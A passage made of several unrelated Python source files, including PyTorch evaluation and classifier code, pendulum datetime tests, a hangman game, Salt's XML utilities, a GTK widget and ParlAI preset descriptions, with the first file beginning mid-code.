self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def test(loader, model, criterion):
# batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
# switch to evaluate mode
model.eval()
with torch.no_grad():
for i, (input, target) in enumerate(loader):
target = target.cuda(async=True)
input = input.cuda(async=True)
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# print(input_var.device)
# compute output
output = model(input_var)
loss = criterion(output, target_var)
# measure accuracy and record loss
prec1 = accuracy(output.data, target, topk=(1))
losses.update(loss.data, input.size(0))
top1.update(prec1[0], input.size(0))
# measure elapsed time
# batch_time.update(time.time() - end)
# end = time.time()
if len(input_var) < 9:
continue
writer.add_figure('predictions vs. actuals',
plot_classes_preds(model, input_var, target),
global_step=i)
print(' Loss {loss.avg:.4f}\tPrec@1 {top1.avg:.3f}'
.format(loss=losses, top1=top1))
return top1.avg
def plot_classes_preds(net, images, labels):
'''
Generates matplotlib Figure using a trained network, along with images
and labels from a batch, that shows the network's top prediction along
with its probability, alongside the actual label, coloring this
information based on whether the prediction was correct or not.
Uses the "images_to_probs" function.
'''
preds, probs = images_to_probs(net, images)
# plot the images in the batch, along with predicted and true labels
fig = plt.figure(figsize=(10, 10))
for idx in np.arange(9):
ax = fig.add_subplot(3, 3, idx+1, xticks=[], yticks=[])
matplotlib_imshow(images[idx], one_channel=True)
ax.set_title("{0}, {1:.1f}%\n(label: {2})".format(
classes[preds[idx]],
probs[idx] * 100.0,
classes[labels[idx].item()]),
color=("green" if preds[idx]==labels[idx].item() else "red"))
return fig
def images_to_probs(net, images):
'''
Generates predictions and corresponding probabilities from a trained
network and a list of images
'''
output = net(images)
# convert output probabilities to predicted class
_, preds_tensor = torch.max(output, 1)
preds = np.squeeze(preds_tensor.cpu().numpy())
return preds, [F.softmax(el, dim=0)[i].item() for i, el in zip(preds, output)]
def matplotlib_imshow(img, one_channel=False):
if one_channel:
img = img.mean(dim=0)
img = img / 2 + 0.5 # unnormalize
npimg = img.cpu().numpy()
if one_channel:
plt.imshow(npimg, cmap="Greys")
else:
plt.imshow(np.transpose(npimg, (1, 2, 0)))
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
# maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(1, 1, True, True)
pred = pred.t()
## Code to test the merging of escalator and staircase
# pred[pred==2] = 0
# target[target==2] = 0
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
# for k in topk:
correct_k = correct[:1].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
#
# Copyright 2010 Google Inc. All Rights Reserved.
"""Tests for moe.mercurial."""
__author__ = 'dbentley@google.com (Daniel Bentley)'
from google.apputils import basetest
from moe import base
from moe import mercurial
from moe import moe_app
import test_util
REPO = None
def setUp():
global REPO
moe_app.InitForTest()
REPO = mercurial.MercurialRepository(
EXAMPLE_REPOSITORY_URL,
'test')
# We use an actual repository for end-to-end testing.
EXAMPLE_REPOSITORY_URL = 'https://jgments.googlecode.com/hg/'
class MercurialTest(basetest.TestCase):
def testHeadRevision(self):
self.assertEqual('47b097c7d97e', REPO.GetHeadRevision('47b097c7d97e'))
self.assertNotEqual('47b097c7d97e', REPO.GetHeadRevision())
def testRevisionsSinceEquivalence(self):
def Revision2b02deffcc80(r):
return r.rev_id == '2b02deffcc80'
rs = REPO.RecurUntilMatchingRevision('ceadf5c0ce18', Revision2b02deffcc80)
rev_ids = [r.rev_id for r in rs]
self.assertListEqual(['ceadf5c0ce18', '47b097c7d97e', '2b02deffcc80'],
rev_ids)
def testRevisionFromId(self):
REPO.MakeRevisionFromId('123456789012')
if __name__ == '__main__':
basetest.main()
|
import pytz
from datetime import datetime
import pendulum
from ..conftest import assert_datetime
def test_equal_to_true():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d3 = datetime(2000, 1, 1, 1, 2, 3, tzinfo= pendulum.UTC)
assert d2 == d1
assert d3 == d1
def test_equal_to_false():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 2, 1, 2, 3)
d3 = datetime(2000, 1, 2, 1, 2, 3, tzinfo= pendulum.UTC)
assert d2 != d1
assert d3 != d1
def test_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 0, tz='America/Vancouver')
d3 = datetime(2000, 1, 1, 12, 0, 0,
tzinfo= pendulum.timezone('America/Toronto'))
assert d2 == d1
assert d3 == d1
def test_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, tz='America/Vancouver')
d3 = datetime(2000, 1, 1, tzinfo= pendulum.timezone('America/Toronto'))
assert d2 != d1
assert d3 == d1
def test_not_equal_to_true():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 2, 1, 2, 3)
d3 = datetime(2000, 1, 2, 1, 2, 3, tzinfo= pendulum.UTC)
assert d2 != d1
assert d3 != d1
def test_not_equal_to_false():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d2 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
d3 = datetime(2000, 1, 1, 1, 2, 3, tzinfo= pendulum.UTC)
assert d2 == d1
assert d3 == d1
def test_not_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, tz='America/Vancouver')
d3 = datetime(2000, 1, 1, tzinfo= pendulum.timezone('America/Toronto'))
assert d2 != d1
assert d3 == d1
def test_not_equal_to_none():
d1 = pendulum.datetime(2000, 1, 1, 1, 2, 3)
assert d1 != None
def test_greater_than_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(1999, 12, 31)
d3 = datetime(1999, 12, 31, tzinfo= pendulum.UTC)
assert d1 > d2
assert d1 > d3
def test_greater_than_false():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo= pendulum.UTC)
assert not d1 > d2
assert not d1 > d3
def test_greater_than_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 8, 59, 59))
assert d1 > d2
assert d1 > d3
def test_greater_than_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 9, 0, 1))
assert not d1 > d2
assert not d1 > d3
def test_greater_than_or_equal_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(1999, 12, 31)
d3 = datetime(1999, 12, 31, tzinfo= pendulum.UTC)
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_true_equal():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo= pendulum.UTC)
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_false():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo= pendulum.UTC)
assert not d1 >= d2
assert not d1 >= d3
def test_greater_than_or_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 8, 59, 59))
assert d1 >= d2
assert d1 >= d3
def test_greater_than_or_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d2 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
d3 = pytz.timezone('America/Vancouver').localize(datetime(2000, 1, 1, 9, 0, 1))
assert not d1 >= d2
assert not d1 >= d3
def test_less_than_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert d1 < d2
assert d1 < d3
def test_less_than_false():
d1 = pendulum.datetime(2000, 1, 2)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert not d1 < d2
assert not d1 < d3
def test_less_than_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert d1 < d2
assert d1 < d3
def test_less_than_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert not d1 < d2
assert not d1 < d3
def test_less_than_or_equal_true():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 2)
d3 = datetime(2000, 1, 2, tzinfo=pendulum.UTC)
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_true_equal():
d1 = pendulum.datetime(2000, 1, 1)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_false():
d1 = pendulum.datetime(2000, 1, 2)
d2 = pendulum.datetime(2000, 1, 1)
d3 = datetime(2000, 1, 1, tzinfo=pendulum.UTC)
assert not d1 <= d2
assert not d1 <= d3
def test_less_than_or_equal_with_timezone_true():
d1 = pendulum.datetime(2000, 1, 1, 8, 59, 59, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert d1 <= d2
assert d1 <= d3
def test_less_than_or_equal_with_timezone_false():
d1 = pendulum.datetime(2000, 1, 1, 9, 0, 1, tz='America/Vancouver')
d2 = pendulum.datetime(2000, 1, 1, 12, 0, 0, tz='America/Toronto')
d3 = pytz.timezone('America/Toronto').localize(datetime(2000, 1, 1, 12, 0, 0))
assert not d1 <= d2
assert not d1 <= d3
def test_is_birthday():
with pendulum.test(pendulum.now()):
d = pendulum.now()
a_birthday = d.subtract(years=1)
assert a_birthday.is_birthday()
not_a_birthday = d.subtract(days=1)
assert not not_a_birthday.is_birthday()
also_not_a_birthday = d.add(days=2)
assert not also_not_a_birthday.is_birthday()
d1 = pendulum.datetime(1987, 4, 23)
d2 = pendulum.datetime(2014, 9, 26)
d3 = pendulum.datetime(2014, 4, 23)
assert not d2.is_birthday(d1)
assert d3.is_birthday(d1)
def test_closest():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 11, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert closest == dt1
closest = instance.closest(dt2, dt1)
assert closest == dt1
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(
hours=x) for x in range(4)]
closest = instance.closest(*dts)
assert closest == dts[0]
closest = instance.closest(*(dts[::-1]))
assert closest == dts[0]
def test_closest_with_datetime():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = datetime(2015, 5, 28, 11, 0, 0)
dt2 = datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert_datetime(closest, 2015, 5, 28, 11, 0, 0)
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(
hours=x) for x in range(4)]
closest = instance.closest(dt1, dt2, *dts)
assert_datetime(closest, 2015, 5, 28, 11, 0, 0)
def test_closest_with_equals():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
closest = instance.closest(dt1, dt2)
assert closest == dt1
def test_farthest():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 11, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
farthest = instance.farthest(dt1, dt2)
assert farthest == dt2
farthest = instance.farthest(dt2, dt1)
assert farthest == dt2
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(
hours=x) for x in range(4)]
farthest = instance.farthest(*dts)
assert farthest == dts[-1]
farthest = instance.farthest(*(dts[::-1]))
assert farthest == dts[-1]
f = pendulum.datetime(2010, 1, 1, 0, 0, 0)
assert f == instance.farthest(f, *(dts))
def test_farthest_with_datetime():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = datetime(2015, 5, 28, 11, 0, 0, tzinfo= pendulum.UTC)
dt2 = datetime(2015, 5, 28, 14, 0, 0, tzinfo= pendulum.UTC)
farthest = instance.farthest(dt1, dt2)
assert_datetime(farthest, 2015, 5, 28, 14, 0, 0)
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(
hours=x) for x in range(4)]
farthest = instance.farthest(dt1, dt2, *dts)
assert_datetime(farthest, 2015, 5, 28, 19, 0, 0)
def test_farthest_with_equals():
instance = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 28, 14, 0, 0)
farthest = instance.farthest(dt1, dt2)
assert farthest == dt2
dts = [pendulum.datetime(2015, 5, 28, 16, 0, 0) + pendulum.duration(hours=x) for x in range(4)]
farthest = instance.farthest(dt1, dt2, *dts)
assert farthest == dts[-1]
def test_is_same_day():
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 29, 12, 0, 0)
dt3 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt4 = datetime(2015, 5, 28, 12, 0, 0, tzinfo=pendulum.UTC)
dt5 = datetime(2015, 5, 29, 12, 0, 0, tzinfo=pendulum.UTC)
assert not dt1.is_same_day(dt2)
assert dt1.is_same_day(dt3)
assert dt1.is_same_day(dt4)
assert not dt1.is_same_day(dt5)
def test_comparison_to_unsupported():
dt1 = pendulum.now()
assert dt1 != 'test'
assert dt1 not in ['test']
|
"""
File: hangman.py
Name: Jess Hung
-----------------------------
This program plays hangman game.
Users sees a dashed word, trying to
correctly figure the un-dashed word out
by inputting one character each round.
If the user input is correct, show the
updated word on console. Players have N_TURNS
chances to try and win this game.
"""
import random
# This constant controls the number of guess the player has.
N_TURNS = 7
def main():
"""
Hangman Game!
First, settle down the word and turns for this round
Second, remind the player for some tips
Third, player inputs the character
Fourth, check the input is legal or not
Last, hangman!
"""
word = random_word()
n_turn = N_TURNS
reminders(word, n_turn)
guess = str(input('Your guess: '))
guess = check(guess)
hangman(guess, word, n_turn)
def reminders(word, n_turn):
"""
This function gives the player some hints in the beginning
"""
print('The word looks like: ' + '-' * len(word))
print('You have ' + str(n_turn) + ' guesses left.')
def check(guess):
"""
This function made for case-sensitive,
and use the loop to confirm the input from player
"""
guess = guess.upper()
while not guess.isalpha() or not len(guess) == 1:
print('illegal format')
guess = str(input('Your guess: '))
guess = guess.upper()
return guess
def hangman(guess, word, n_turn):
"""
The function for hangman game procedure
"""
# create the list for documenting the correct guess
ans = []
for char in word:
ans.append('-')
# the game is still on, until the number of turns turn to 0,
while n_turn > 0:
if guess in word:
print('You are correct!')
for i in range(len(word)):
if guess == word[i]:
ans[i] = guess
if "".join(ans) != word:
print('The word looks like: ' + "".join(ans))
print('You have ' + str(n_turn) + ' guesses left.')
guess = str(input('Your guess: '))
guess = check(guess)
else:
win(word)
break
else:
n_turn -= 1
print('There is no ' + guess + "'s" + ' in the word.')
if n_turn > 0:
print('The word looks like: ' + "".join(ans))
print('You have ' + str(n_turn) + ' guesses left.')
guess = str(input('Your guess: '))
guess = check(guess)
else:
lose(word)
break
def win(word):
"""
Final note for the winner!
"""
print('You win!!')
print('The word was: ' + word)
def lose(word):
"""
Final note for the loser ;(
"""
print('You are completely hung :(')
print('The word was: ' + word)
def random_word():
num = random.choice(range(9))
if num == 0:
return "NOTORIOUS"
elif num == 1:
return "GLAMOROUS"
elif num == 2:
return "CAUTIOUS"
elif num == 3:
return "DEMOCRACY"
elif num == 4:
return "BOYCOTT"
elif num == 5:
return "ENTHUSIASTIC"
elif num == 6:
return "HOSPITALITY"
elif num == 7:
return "BUNDLE"
elif num == 8:
return "REFUND"
##### DO NOT EDIT THE CODE BELOW THIS LINE #####
if __name__ == '__main__':
main()
|
from algoliasearch_django import AlgoliaIndex
from algoliasearch_django.decorators import register
from products.models import Product
from category.models import Category
@register(Product)
class ProductIndex(AlgoliaIndex):
fields = ('title',)
settings = {
'searchableAttributes': ['title',]
}
index_name = 'products'
@register(Category)
class CategoryIndex(AlgoliaIndex):
fields = ('category',)
settings = {
'searchableAttributes': ['category',]
}
index_name = 'categories'
# python manage.py algolia_reindex: reindex all the registered models. This command will first send all the record to a temporary index and then moves it.
# you can pass --model parameter to reindex a given model
# python manage.py algolia_applysettings: (re)apply the index settings.
# python manage.py algolia_clearindex: clear the index
|
# encoding: utf-8
import torch.nn as nn
from torch.nn import functional as F
class SingleLinearClassifier(nn.Module):
def __init__(self, hidden_size, num_label):
super(SingleLinearClassifier, self).__init__()
self.num_label = num_label
self.classifier = nn.Linear(hidden_size, num_label)
def forward(self, input_features):
features_output = self.classifier(input_features)
return features_output
class MultiNonLinearClassifier(nn.Module):
def __init__(self, hidden_size, num_label, dropout_rate):
super(MultiNonLinearClassifier, self).__init__()
self.num_label = num_label
self.classifier1 = nn.Linear(hidden_size, hidden_size)
self.classifier2 = nn.Linear(hidden_size, num_label)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, input_features):
features_output1 = self.classifier1(input_features)
# features_output1 = F.relu(features_output1)
features_output1 = F.gelu(features_output1)
features_output1 = self.dropout(features_output1)
features_output2 = self.classifier2(features_output1)
return features_output2
|
import gi, logging
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk, Gio, GObject, GLib
from .account_tile import AccountTile
class AccountPane(Gtk.ScrolledWindow):
def __init__(self, model):
super().__init__()
self.model = model
self.flow_box = Gtk.FlowBox()
self.flow_box.set_orientation(Gtk.Orientation.HORIZONTAL)
self.flow_box.set_margin_top(25)
self.flow_box.set_margin_right(25)
self.flow_box.set_margin_bottom(25)
self.flow_box.set_margin_left(25)
self.flow_box.set_vexpand(False)
self.flow_box.set_vexpand_set(False)
self.flow_box.set_selection_mode(Gtk.SelectionMode.NONE)
self.flow_box.set_column_spacing(25)
self.flow_box.set_row_spacing(25)
self.flow_box.set_homogeneous(True)
self.add(self.flow_box)
self.update()
def update(self, new_transaction_ids=None):
for c in self.flow_box.get_children():
c.destroy()
for account in self.model.accounts():
self.flow_box.add(AccountTile(self.model, account))
self.flow_box.show_all()
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
List of all opt presets distributed with ParlAI.
This file is for automatically generating docs.
"""
# PRESET_DESCRIPTIONS is a dictionary mapping alias names to human descriptions
# for the sake of documentation
PRESET_DESCRIPTIONS = {
"gen/meena": (
"Inference parameters for the Sample & Rank procedure of Meena. "
"See [Adiwardana et al. (2020)](https://arxiv.org/abs/2001.09977)."
),
"arch/blenderbot_3B": (
"Architecture parameters (number layers, etc) for BlenderBot 3B. See "
"[Roller et al. (2020)](https://arxiv.org/abs/2004.13637)"
),
"gen/blenderbot": (
"Beam search parameters for BlenderBot. See"
"[Roller et al. (2020)](https://arxiv.org/abs/2004.13637)"
),
}
|
"""
Various XML utilities
"""
import re
import string # pylint: disable=deprecated-module
from xml.etree import ElementTree
import salt.utils.data
def _conv_name(x):
"""
If this XML tree has an xmlns attribute, then etree will add it
to the beginning of the tag, like: "{http://path}tag".
"""
if "}" in x:
comps = x.split("}")
name = comps[1]
return name
return x
def _to_dict(xmltree):
"""
Converts an XML ElementTree to a dictionary that only contains items.
This is the default behavior in version 2017.7. This will default to prevent
unexpected parsing issues on modules dependent on this.
"""
# If this object has no children, the for..loop below will return nothing
# for it, so just return a single dict representing it.
if not xmltree:
name = _conv_name(xmltree.tag)
return {name: xmltree.text}
xmldict = {}
for item in xmltree:
name = _conv_name(item.tag)
if name not in xmldict:
if item:
xmldict[name] = _to_dict(item)
else:
xmldict[name] = item.text
else:
# If a tag appears more than once in the same place, convert it to
# a list. This may require that the caller watch for such a thing
# to happen, and behave accordingly.
if not isinstance(xmldict[name], list):
xmldict[name] = [xmldict[name]]
xmldict[name].append(_to_dict(item))
return xmldict
def _to_full_dict(xmltree):
"""
Returns the full XML dictionary including attributes.
"""
xmldict = {}
for attrName, attrValue in xmltree.attrib.items():
xmldict[attrName] = attrValue
if not xmltree:
if not xmldict:
# If we don't have attributes, we should return the value as a string
# ex: <entry>test</entry>
return xmltree.text
elif xmltree.text:
# XML allows for empty sets with attributes, so we need to make sure that capture this.
# ex: <entry name="test"/>
xmldict[_conv_name(xmltree.tag)] = xmltree.text
for item in xmltree:
name = _conv_name(item.tag)
if name not in xmldict:
xmldict[name] = _to_full_dict(item)
else:
# If a tag appears more than once in the same place, convert it to
# a list. This may require that the caller watch for such a thing
# to happen, and behave accordingly.
if not isinstance(xmldict[name], list):
xmldict[name] = [xmldict[name]]
xmldict[name].append(_to_full_dict(item))
return xmldict
def to_dict(xmltree, attr=False):
"""
Convert an XML tree into a dict. The tree that is passed in must be an
ElementTree object.
Args:
xmltree: An ElementTree object.
attr: If true, attributes will be parsed. If false, they will be ignored.
"""
if attr:
return _to_full_dict(xmltree)
else:
return _to_dict(xmltree)
def get_xml_node(node, xpath):
"""
Get an XML node using a path (super simple xpath showing complete node ancestry).
This also creates the missing nodes.
The supported XPath can contain elements filtering using [@attr='value'].
Args:
node: an Element object
xpath: simple XPath to look for.
"""
if not xpath.startswith("./"):
xpath = "./{}".format(xpath)
res = node.find(xpath)
if res is None:
parent_xpath = xpath[: xpath.rfind("/")]
parent = node.find(parent_xpath)
if parent is None:
parent = get_xml_node(node, parent_xpath)
segment = xpath[xpath.rfind("/") + 1 :]
# We may have [] filter in the segment
matcher = re.match(
r"""(?P<tag>[^[]+)(?:\[@(?P<attr>\w+)=["'](?P<value>[^"']+)["']])?""",
segment,
)
attrib = (
{matcher.group("attr"): matcher.group("value")}
if matcher.group("attr") and matcher.group("value")
else {}
)
res = ElementTree.SubElement(parent, matcher.group("tag"), attrib)
return res
def set_node_text(node, value):
"""
Function to use in the ``set`` value in the :py:func:`change_xml` mapping items to set the text.
This is the default.
:param node: the node to set the text to
:param value: the value to set
"""
node.text = str(value)
def clean_node(parent_map, node, ignored=None):
"""
Remove the node from its parent if it has no attribute but the ignored ones, no text and no child.
Recursively called up to the document root to ensure no empty node is left.
:param parent_map: dictionary mapping each node to its parent
:param node: the node to clean
:param ignored: a list of ignored attributes.
:return: True if anything has been removed, False otherwise
"""
has_text = node.text is not None and node.text.strip()
parent = parent_map.get(node)
removed = False
if (
len(node.attrib.keys() - (ignored or [])) == 0
and not list(node)
and not has_text
and parent
):
parent.remove(node)
removed = True
# Clean parent nodes if needed
if parent is not None:
parent_cleaned = clean_node(parent_map, parent, ignored)
removed = removed or parent_cleaned
return removed
def del_text(parent_map, node):
"""
Function to use as ``del`` value in the :py:func:`change_xml` mapping items to remove the text.
This is the default function.
Calls :py:func:`clean_node` before returning.
"""
parent = parent_map[node]
parent.remove(node)
clean_node(parent, node)
return True
def del_attribute(attribute, ignored=None):
"""
Helper returning a function to use as ``del`` value in the :py:func:`change_xml` mapping items to
remove an attribute.
The generated function calls :py:func:`clean_node` before returning.
:param attribute: the name of the attribute to remove
:param ignored: the list of attributes to ignore during the cleanup
:return: the function called by :py:func:`change_xml`.
"""
def _do_delete(parent_map, node):
if attribute not in node.keys():
return False
node.attrib.pop(attribute)
clean_node(parent_map, node, ignored)
return True
return _do_delete
def attribute(path, xpath, attr_name, ignored=None, convert=None):
"""
Helper function creating a change_xml mapping entry for a text XML attribute.
:param path: the path to the value in the data
:param xpath: the xpath to the node holding the attribute
:param attr_name: the attribute name
:param ignored: the list of attributes to ignore when cleaning up the node
:param convert: a function used to convert the value
"""
entry = {
"path": path,
"xpath": xpath,
"get": lambda n: n.get(attr_name),
"set": lambda n, v: n.set(attr_name, str(v)),
"del": salt.utils.xmlutil.del_attribute(attr_name, ignored),
}
if convert:
entry["convert"] = convert
return entry
def int_attribute(path, xpath, attr_name, ignored=None):
"""
Helper function creating a change_xml mapping entry for a text XML integer attribute.
:param path: the path to the value in the data
:param xpath: the xpath to the node holding the attribute
:param attr_name: the attribute name
:param ignored: the list of attributes to ignore when cleaning up the node
"""
return {
"path": path,
"xpath": xpath,
"get": lambda n: int(n.get(attr_name)) if n.get(attr_name) else None,
"set": lambda n, v: n.set(attr_name, str(v)),
"del": salt.utils.xmlutil.del_attribute(attr_name, ignored),
}
def change_xml(doc, data, mapping):
"""
Change an XML ElementTree document according.
:param doc: the ElementTree parsed XML document to modify
:param data: the dictionary of values used to modify the XML.
:param mapping: a list of items describing how to modify the XML document.
Each item is a dictionary containing the following keys:
.. glossary::
path
the path to the value to set or remove in the ``data`` parameter.
See :py:func:`salt.utils.data.get_value <salt.utils.data.get_value>` for the format
of the value.
xpath
Simplified XPath expression used to locate the change in the XML tree.
See :py:func:`get_xml_node` documentation for details on the supported XPath syntax
get
function gettin the value from the XML.
Takes a single parameter for the XML node found by the XPath expression.
Default returns the node text value.
This may be used to return an attribute or to perform value transformation.
set
function setting the value in the XML.
Takes two parameters for the XML node and the value to set.
Default is to set the text value.
del
function deleting the value in the XML.
Takes two parameters for the parent node and the node matched by the XPath.
Returns True if anything was removed, False otherwise.
Default is to remove the text value.
More cleanup may be performed, see the :py:func:`clean_node` function for details.
convert
function modifying the user-provided value right before comparing it with the one from the XML.
Takes the value as single parameter.
Default is to apply no conversion.
:return: ``True`` if the XML has been modified, ``False`` otherwise.
"""
need_update = False
for param in mapping:
# Get the value from the function parameter using the path-like description
# Using an empty list as a default value will cause values not provided by the user
# to be left untouched, as opposed to explicit None unsetting the value
values = salt.utils.data.get_value(data, param["path"], [])
xpath = param["xpath"]
# Prepend the xpath with ./ to handle the root more easily
if not xpath.startswith("./"):
xpath = "./{}".format(xpath)
placeholders = [
s[1:-1]
for s in param["path"].split(":")
if s.startswith("{") and s.endswith("}")
]
ctx = {placeholder: "$$$" for placeholder in placeholders}
all_nodes_xpath = string.Template(xpath).substitute(ctx)
all_nodes_xpath = re.sub(
r"""(?:=['"]\$\$\$["'])|(?:\[\$\$\$\])""", "", all_nodes_xpath
)
# Store the nodes that are not removed for later cleanup
kept_nodes = set()
for value_item in values:
new_value = value_item["value"]
# Only handle simple type values. Use multiple entries or a custom get for dict or lists
if isinstance(new_value, list) or isinstance(new_value, dict):
continue
if new_value is not None:
# We need to increment ids from arrays since xpath starts at 1
converters = {
p: (lambda n: n + 1)
if "[${}]".format(p) in xpath
else (lambda n: n)
for p in placeholders
}
ctx = {
placeholder: converters[placeholder](
value_item.get(placeholder, "")
)
for placeholder in placeholders
}
node_xpath = string.Template(xpath).substitute(ctx)
node = get_xml_node(doc, node_xpath)
kept_nodes.add(node)
get_fn = param.get("get", lambda n: n.text)
set_fn = param.get("set", set_node_text)
current_value = get_fn(node)
# Do we need to apply some conversion to the user-provided value?
convert_fn = param.get("convert")
if convert_fn:
new_value = convert_fn(new_value)
# Allow custom comparison. Can be useful for almost equal numeric values
compare_fn = param.get("equals", lambda o, n: str(o) == str(n))
if not compare_fn(current_value, new_value):
set_fn(node, new_value)
need_update = True
else:
nodes = doc.findall(all_nodes_xpath)
del_fn = param.get("del", del_text)
parent_map = {c: p for p in doc.iter() for c in p}
for node in nodes:
deleted = del_fn(parent_map, node)
need_update = need_update or deleted
# Clean the left over XML elements if there were placeholders
if placeholders and [v for v in values if v.get("value") != []]:
all_nodes = set(doc.findall(all_nodes_xpath))
to_remove = all_nodes - kept_nodes
del_fn = param.get("del", del_text)
parent_map = {c: p for p in doc.iter() for c in p}
for node in to_remove:
deleted = del_fn(parent_map, node)
need_update = need_update or deleted
return need_update
def strip_spaces(node):
"""
Remove all spaces and line breaks before and after nodes.
This helps comparing XML trees.
:param node: the XML node to remove blanks from
:return: the node
"""
if node.tail is not None:
node.tail = node.tail.strip(" \t\n")
if node.text is not None:
node.text = node.text.strip(" \t\n")
try:
for child in node:
strip_spaces(child)
except RecursionError:
raise Exception("Failed to recurse on the node")
return node
def element_to_str(node):
"""
Serialize an XML node into a string
"""
return salt.utils.stringutils.to_str(ElementTree.tostring(node))
|
from cec15 import *
|
class Puzzle3:
def __init__(self, puzzle_input):
self.puzzle_input = puzzle_input
def calculate_gamma_epsilon(self):
gamma = ''
epsilon = ''
for i in range(len(self.puzzle_input[0])):
values = [x[i] for x in self.puzzle_input]
g = self.group(values)
gamma += max(g, key=g.get)
epsilon += min(g, key=g.get)
return int(gamma,2) * int(epsilon,2)
